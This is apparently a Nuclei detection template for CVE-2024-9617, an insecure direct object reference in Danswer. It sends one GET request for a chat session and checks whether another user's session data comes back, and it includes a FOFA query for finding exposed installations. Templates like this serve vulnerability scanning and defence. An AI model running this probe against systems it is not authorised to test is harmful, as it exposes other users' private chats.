37 lines
1.3 KiB
YAML
37 lines
1.3 KiB
YAML
id: CVE-2024-9617
|
|
|
|
info:
|
|
name: Danswer - Insecure Direct Object Reference
|
|
author: s4e-io
|
|
severity: medium
|
|
description: |
|
|
The application does not verify whether the attacker is the creator of the file, allowing the attacker to directly call the GET /api/chat/file/{file_id} interface to view any user's file.
|
|
reference:
|
|
- https://huntr.com/bounties/8f683ff6-3a99-41c6-b763-a8f7b73bd146
|
|
- https://github.com/danswer-ai/danswer
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2024-9617
|
|
cwe-id: CWE-284
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: danswer-ai
|
|
product: danswer
|
|
fofa-query: icon_hash="484766002"
|
|
tags: cve,cve2024,danswer,idor
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/api/chat/get-chat-session/1?is_shared=True"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'contains_all(body, "chat_session_id", "description", "persona_id")'
|
|
- 'contains(content_type, "application/json")'
|
|
- 'status_code == 200'
|
|
condition: and
|
|
# digest: 4a0a00473045022100e64b3d2636dbf55879536d230e71df84dcfcc0e5ef62fa677eeaaa64f173d2a1022008463e83fef212edde67e0be613f8beba615bedd7e42f02dc919ba1c6b95dc30:922c64590222798bb761d5b6d8e72950 |